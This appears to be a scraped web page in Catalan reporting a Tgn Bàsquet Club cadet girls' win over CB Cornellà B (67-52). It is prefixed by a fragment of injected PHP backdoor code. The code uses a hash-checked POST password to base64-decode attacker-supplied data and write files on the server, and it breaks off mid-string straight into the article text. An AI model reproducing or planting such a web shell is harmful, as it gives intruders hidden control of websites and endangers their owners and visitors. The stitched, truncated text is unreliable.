function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 05 A ajusta la seva defensa i derrota el CB Cornellà B (67-52) - Tgn Bàsquet Club -

El cadet femení 05 A ajusta la seva defensa i derrota el CB Cornellà B (67-52)

Updated: gener 14, 2020

L’equip cadet femení 05 A va derrotar el CB Cornellà B en un partit marcat per la defensa de les liles. Així, una bona sortida de les tarragonines les va permetre obrir les primeres diferències però un cop van afluixar el ritme les visitants ho van aprofitar per igualar el matx (28-28 al descans). Només la millora defensiva en el tercer quart, i especialment en el quart, van permetre el TGN Bàsquet marcar un parcial de 23-10 i endur-se el triomf.